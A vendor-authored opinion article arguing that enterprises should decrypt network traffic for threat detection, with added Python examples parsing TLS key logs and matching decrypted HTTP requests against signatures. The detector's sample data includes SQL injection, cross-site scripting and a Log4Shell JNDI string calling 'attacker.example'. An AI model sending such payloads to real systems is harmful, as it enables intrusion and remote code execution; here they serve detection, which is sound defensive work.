Decryption has become critical for cybersecurity teams

Daniel Chu by Daniel Chu
July 27, 2022
Photo by cottonbro from Pexels: https://www.pexels.com/photo/photo-of-cryptic-character-codes-7319085/

Strong encryption is critical to protecting sensitive business and personal data. Google estimates that 95% of its internet traffic uses the encrypted HTTPS protocol, and most industry analyst firms conclude that between 80% and 90% of network traffic is encrypted today.

The bottom line is that failing to encrypt traffic can lead to incidents such as the leak at a Singapore clinic that compromised the personal data of over 70,000 patients along with clinic information, and interrupted business operations.

However, organisations committed to data privacy are not the only ones who see value in obscuring their digital footprint in encrypted traffic. Cybercriminals have been quick to weaponize encryption as a means to hide their malicious activity in otherwise benign traffic.

In recent years, security researchers have seen an increase in sophisticated attack techniques leveraging encrypted channels. These techniques often ride on commonly abused Microsoft protocols and services, such as SMBv3, Active Directory, Kerberos, Microsoft Remote Procedure Call (MS-RPC), NTLM, LDAP and WinRM, in addition to TLS 1.3.

All of this has catalysed the need for a new approach when it comes to detecting threats within encrypted traffic: namely, decryption. Decryption can detect post-compromise activity that encrypted traffic analysis (ETA) misses, including ransomware campaigns that exploit the PrintNightmare vulnerability.

Today, it’s nearly impossible to tell the good from the bad without the ability to decrypt traffic securely. The ability to remain invisible has given cyberattackers the upper hand. Encrypted traffic has been exploited in some of the most significant cyberattacks and exploit techniques of the past year, from Sunburst and Kaseya to PrintNightmare, ProxyLogon, and the recent high-profile Log4J attacks.

Attack techniques such as living-off-the-land and Golden Ticket attacks are only successful because attackers can exploit organisations’ encrypted traffic. Ransomware is also top of mind for businesses right now. With only 31% of Singapore businesses stating they can identify and block ransomware, just as many are crippled by the fact that they cannot see what is happening laterally within their network perimeter.

Organisations have been wary of embracing decryption due to concerns around compliance, privacy, and security, as well as performance impacts and high computing costs. But there are ways to decrypt traffic without compromising compliance, security, privacy, or performance. Let’s debunk some of the common myths and misconceptions.

Myth 1: Decryption weakens security

Truth: There are two main kinds of decryption: out-of-band and in-line. In-line decryption, also known as SSL interception or man-in-the-middle (MitM), is an older approach that adds complications and costs: organisations must deploy additional in-line interception devices and manage the certificates that go with them.

Out-of-band decryption is an elegant solution because it automatically gathers the dynamic key material (session secrets) from the encryption termination endpoint (typically the server side). This removes the deployment complexity, cost, and risk historically associated with network decryption in the enterprise.

Myth 2: Decryption violates privacy laws & compliance standards

Truth: Decryption of enterprise network traffic does not violate privacy regulations or laws, and helps organisations stay compliant with data privacy legislation. Malaysia's Personal Data Protection Act (PDPA) only goes so far as to state that user data should not be misused and misapplied.

Meanwhile, Singapore's PDPA establishes a baseline to work alongside sector-specific legislative and regulatory frameworks, encompassing the collection, use, disclosure, and care of personal data.

This puts a big responsibility on businesses to secure traffic where forensic auditing is required or to investigate incidents on critical systems — such as customer databases or systems housing valuable intellectual property.

However, this is put at risk by encrypted attacks, where advanced attackers use techniques like privilege escalation and exploiting encrypted protocols to slip under the radar. These are viable means for threat actors to rapidly distribute ransomware or other malicious files without detection, as well as to exfiltrate data.

This is where decryption systems that do not write decrypted payload data to disk are crucial: they enable real-time traffic analysis and then discard the session keys, unless continuous packet capture is deployed. Optionally, businesses can choose solutions that can be configured to store the session key alongside the captured packets, an approach that is safer than sharing the long-term private key with analysts.
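The out-of-band approach described under Myth 1 and the "store the session key with the packets" configuration described just above rest on the same mechanism: the endpoint that terminates TLS exports its per-session secrets, and the analysis system matches each secret to the session it belongs to. The Python below is an added example, not code from the article or from ExtraHop. It uses the NSS key log format that Wireshark and most TLS libraries already support, with a constructed key log and constructed ClientHello records (the hex values are made up for the example). It shows the lookup from a captured ClientHello's client_random to that session's secrets, and that a session with no logged secret stays opaque. Because TLS 1.3 uses only ephemeral key exchange, the server's long-term private key could not recover a recorded session anyway; only the per-session secrets can, and each secret unlocks exactly one session.

```python
"""Out-of-band TLS decryption keys off per-session secrets, not the server's
long-term private key. The NSS key log format is one line per secret:
    <LABEL> <client_random as 64 hex chars> <secret as hex>
This example parses such a log, pulls client_random out of a captured
ClientHello record, and looks up the secrets for exactly that session.
All inputs below are constructed for the example."""
import re
from typing import Dict

# Labels defined by the NSS key log format. CLIENT_RANDOM carries the
# TLS 1.2 master secret; the others are TLS 1.3 per-direction secrets.
KEYLOG_LABELS = {
    "CLIENT_RANDOM", "CLIENT_EARLY_TRAFFIC_SECRET",
    "CLIENT_HANDSHAKE_TRAFFIC_SECRET", "SERVER_HANDSHAKE_TRAFFIC_SECRET",
    "CLIENT_TRAFFIC_SECRET_0", "SERVER_TRAFFIC_SECRET_0", "EXPORTER_SECRET",
}
_HEX = re.compile(r"^[0-9a-fA-F]+$")


def parse_keylog(text: str) -> Dict[str, Dict[str, str]]:
    """Map client_random (hex) -> {label: secret_hex}. Malformed lines are
    skipped, not trusted: a bad line must not poison the lookup table."""
    sessions: Dict[str, Dict[str, str]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) != 3 or parts[0] not in KEYLOG_LABELS:
            continue
        label, client_random, secret = parts
        if len(client_random) != 64 or not _HEX.match(client_random):
            continue
        if len(secret) % 2 or not _HEX.match(secret):
            continue
        sessions.setdefault(client_random.lower(), {})[label] = secret.lower()
    return sessions


def extract_client_random(record: bytes) -> str:
    """Return the 32-byte client_random of a TLS ClientHello record as hex.
    Layout: 5-byte record header (type 0x16), 4-byte handshake header
    (type 0x01), 2-byte legacy_version, then the random."""
    if len(record) < 43 or record[0] != 0x16 or record[5] != 0x01:
        raise ValueError("not a TLS ClientHello record")
    rec_len = int.from_bytes(record[3:5], "big")
    hs_len = int.from_bytes(record[6:9], "big")
    if rec_len != len(record) - 5 or hs_len != rec_len - 4:
        raise ValueError("length fields do not match record size")
    return record[11:43].hex()


def session_secrets(keylog: Dict[str, Dict[str, str]], record: bytes) -> Dict[str, str]:
    """Secrets escrowed for the session this ClientHello opened. An empty
    dict means the session was never logged and cannot be decrypted later."""
    return dict(keylog.get(extract_client_random(record), {}))


def build_client_hello(client_random: bytes) -> bytes:
    """Constructed minimal ClientHello: one cipher suite
    (TLS_AES_128_GCM_SHA256), null compression, no extensions."""
    assert len(client_random) == 32
    body = (b"\x03\x03" + client_random + b"\x00"  # version, random, empty session id
            + b"\x00\x02\x13\x01"                  # cipher_suites
            + b"\x01\x00"                          # compression_methods
            + b"\x00\x00")                         # extensions (none)
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + len(handshake).to_bytes(2, "big") + handshake


# Constructed sample: two sessions captured, only the first one logged.
LOGGED_RANDOM = bytes(range(32))
UNLOGGED_RANDOM = bytes(range(32, 64))
SAMPLE_KEYLOG = f"""# constructed sample, not a real key log
CLIENT_HANDSHAKE_TRAFFIC_SECRET {LOGGED_RANDOM.hex()} {'11' * 32}
SERVER_HANDSHAKE_TRAFFIC_SECRET {LOGGED_RANDOM.hex()} {'22' * 32}
CLIENT_TRAFFIC_SECRET_0 {LOGGED_RANDOM.hex()} {'33' * 32}
SERVER_TRAFFIC_SECRET_0 {LOGGED_RANDOM.hex()} {'44' * 32}
CLIENT_RANDOM deadbeef {'55' * 48}
"""


def demo():
    """Returns (sessions in log, labels for the logged session, secrets for the unlogged one)."""
    keylog = parse_keylog(SAMPLE_KEYLOG)
    logged = session_secrets(keylog, build_client_hello(LOGGED_RANDOM))
    unlogged = session_secrets(keylog, build_client_hello(UNLOGGED_RANDOM))
    return len(keylog), sorted(logged), unlogged


if __name__ == "__main__":
    count, labels, missing = demo()
    print(f"{count} session(s) in key log; logged session has {labels}; unlogged session: {missing}")
```

The truncated `CLIENT_RANDOM deadbeef ...` line is dropped by the parser, which is the behaviour a practitioner wants from anything that ingests key material from another system. The lookup table is also what an analyst is handed in the "session key with the packets" configuration: the secrets for that one capture, never the certificate's private key.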

Myth 3: Threat detection doesn’t require decryption

Truth: Encrypted traffic has emerged as a global trend for cyberattackers to evade detection. Among others, encrypted traffic attacks can hide during both the initial intrusion and lateral movement stages and can also cloak post-compromise activity from most security detection and investigation tools.

Decryption becomes essential for organisations with public-facing websites and web services. For instance, exploits such as SQL injection, cross-site scripting, and Log4J can only be effectively detected and investigated in real time and in detail when the traffic is decrypted and the payload is analysed.
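To make concrete what "analysing the payload" buys a detection team, here is an added Python example (not from the article or from ExtraHop): a few constructed HTTP requests as they would appear to a sensor after decryption, and coarse payload signatures for the three classes the paragraph names. Hostnames and paths are placeholders. None of these patterns exists in the TLS ciphertext, which is why this check can only run post-decryption; the signatures are deliberately simple and are a first-pass filter, not a verdict.

```python
"""Payload inspection that is only possible on decrypted HTTP traffic.
The sample requests are constructed for this example; hosts and paths are
placeholders, not real systems."""
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote_plus

SAMPLE_REQUESTS = [
    # benign search request
    "GET /search?q=quarterly+report&page=2 HTTP/1.1\r\nHost: shop.example\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    # SQL injection attempt, percent-encoded in the query string
    "GET /items?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1\r\nHost: shop.example\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    # reflected cross-site scripting attempt
    "GET /profile?name=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1\r\nHost: shop.example\r\n\r\n",
    # Log4Shell-style lookup string carried in a header rather than the URL
    "GET /api/status HTTP/1.1\r\nHost: api.example\r\nUser-Agent: ${jndi:ldap://attacker.example/a}\r\n\r\n",
]

# Coarse indicators. Real deployments layer many more and tune for their
# own applications; obfuscated Log4Shell variants, for instance, need more.
RULES: Dict[str, "re.Pattern[str]"] = {
    "sqli": re.compile(
        r"'\s*(or|and)\s+'?\w+'?\s*=\s*'?\w+|\bunion\b.{0,20}\bselect\b|;\s*drop\s+table", re.I),
    "xss": re.compile(
        r"<\s*/?\s*script\b|javascript:|\bon(load|error|click|mouseover)\s*=", re.I),
    "log4shell": re.compile(r"\$\{\s*jndi\s*:", re.I),
}


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a raw HTTP/1.x request into (method, decoded target, headers).
    The target is percent-decoded so encoded payloads become visible."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, unquote_plus(target), headers


def inspect_request(raw: str) -> List[str]:
    """Sorted names of the rules that fire on the decrypted request.
    Headers are checked too: the Log4Shell sample only trips there."""
    _method, target, headers = parse_request(raw)
    fields = [target] + list(headers.values())
    hits = {name for name, rx in RULES.items() for field in fields if rx.search(field)}
    return sorted(hits)


def triage(requests: List[str] = SAMPLE_REQUESTS) -> List[List[str]]:
    """Rule hits per request, in input order."""
    return [inspect_request(r) for r in requests]


if __name__ == "__main__":
    for req, hits in zip(SAMPLE_REQUESTS, triage()):
        print(req.split("\r\n", 1)[0], "->", hits or "clean")
```

Two details matter for a real sensor: the target is percent-decoded before matching, since the injection in the second request is invisible until it is, and header values are inspected alongside the URL, because the Log4Shell sample never touches the path. Both steps need the plaintext request, which is the paragraph's point.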

At the midgame stages of an attack, decryption is necessary to understand lateral movement behaviours leveraging Microsoft protocols, as well as communications with critical assets such as backend databases. The ability to decrypt network communications bolsters visibility in a way that is simply not possible otherwise.

Attackers can encrypt their connections to victims to hide their activity from firewalls, intrusion detection systems, and proxies, to laterally move across the network. Additionally, adversaries often use encryption technologies to work with applications and tools that are already on victims' machines, making secure connections from compromised devices to new targets.

Myth 4: Encrypted traffic provides no benefit to attackers

Truth: While most companies use encryption to ensure the privacy of their data, cybercriminals have also become adept at using the same technology to cover up their tracks.

The benefits of decrypting network traffic are many. First, decryption enables the detection of attacks earlier in an attack campaign because malicious payloads are no longer hidden.

Second, decryption reduces the mean-time-to-response because it provides valuable context to ensure rapid detection, scoping, investigation, and remediation of threats. And finally, decryption allows full forensic records necessary for detailed post-compromise investigations.

Daniel Chu is the Vice President of Systems Engineering for APJ at ExtraHop. Spearheading the initial launch of ExtraHop APAC in 2015, he continues to be passionate about engaging in hands-on work and providing technical guidance to customers and partners. Prior to joining ExtraHop, Chu led a regional sales engineering team in Asia-Pacific & Japan at Riverbed Technology. He holds a Masters of Science and undergraduate degree in Electrical Engineering from the Georgia Institute of Technology.

Copyright © 2022 Cxociety Pte Ltd | Designed by Pixl